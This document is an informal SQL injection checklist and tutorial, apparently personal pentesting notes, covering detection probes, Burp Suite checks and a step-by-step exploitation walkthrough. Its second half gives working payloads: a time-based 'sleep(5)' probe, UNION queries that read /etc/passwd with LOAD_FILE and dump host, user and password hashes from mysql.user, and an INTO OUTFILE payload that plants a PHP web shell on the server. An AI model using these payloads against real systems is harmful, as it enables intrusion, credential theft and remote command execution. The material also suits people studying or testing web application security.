sql injection

Checklist

Analyzing vulnerable or not

1. Try error , time-based , union , boolean payload,.....respectively

2. Try Boolean payloads for authentication bypass

Manual data fetch checks

1. check version

2. check database name

3. check user , host , password

4. try group_concat for multiple value fetch

5. use information_schema to fetch data

Basic Checks

1. url , double url encode the payload

2. HTML encode

3. comment after the payload

4. use AND & OR condition to execute payload

5. try to enter invalid value in parameter

Burp Suite checks

1. notice " file size | page load time "

2. find "error" in response , after & before injection payload

3. Inject in cookie

4. Inject the payload in bracket , if normal one not working :- "(payload)"

5. Inject in

Explanation

Before exploitation lets understand how sql works

http://xyz.com/order?id=1

in this url basically the data is getting fetched by the use of SQL QUERY

id=1

to just fetch the details of a product / name / ...whatever their is a parameter called id and the value is 1. their is a sql query running behind :-

SELECT * FROM <table_name> WHERE ID = 1

Here "*" is fetching the all details from the given table with a condition "where" with parameter "id" now we are clear that what is running behind lets move forward

Exploitation

To check whether a parameter is vulnerable and exploitable to sql injection their are 2 techniques

• CREATING ERROR

If we are able to create an error in sql database then its exploitable. we can create error in 5 ways

1. Logical error : enter the non-existing value in parameter

2. error payloads

3. blind payloads

4. boolean payloads

5. union payloads

• FETCHING DATA

1. union select payloads

2. boolean payloads

Note :- if you dont know database name their is always use "information_schema"

Steps to reproduce

1. we need to create an error in database for that i used error & blind sql payload :- (' or sleep(5)) to check whether that payload worked or not notice the changes in web page or you can look at the bottom right cornor of "burp repeater" (file size | time taken to load file)

2. make notes of (file size | page load time) before and after injecting the payload i.e., before :- (6532 bytes | 497 millis) after :- (6234 bytes | 5,578 millis)

3. make the page normal again (non-error page) for that we first count total number of columns we use order by 1,2,3,4... payloads it will not give error on correct column number it will give error non existing column number entered now we have to balance the query i.e., after knowing total no. of colums we have to send the to send exact same no. of columns query in union query union select 1,2,3,4,5,6.,7......payloads now we can see the no of column visible on web i.e., 5, 2, 3, 4

4. Their are lots of things we can do with sql injection. we do all this :- LFI SHELL UPLOAD OUTPUT FILE FETCH USERNAME AND PASSWORD OF DATABASE

LFI

cod=9999999 UNION SELECT 1,LOAD_FILE('/etc/passwd'),3,4,5,6,7#

credentials of database

Here is the payload,

cod=99999 UNION SELECT 1,(SELECT host, user, password FROM mysql.user),3,4,5,6,7#
or
cod=99999 UNION SELECT 1,group_concat(host, user, password)FROM mysql.user,3,4,5,6,7#

localhost
DBadmin
*2D2B7A5E4E637B8FBA1D17F40318F277D29964D0

Writing the shell

union select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6,7 into OUTFILE '/var/www/html/rev.php'sql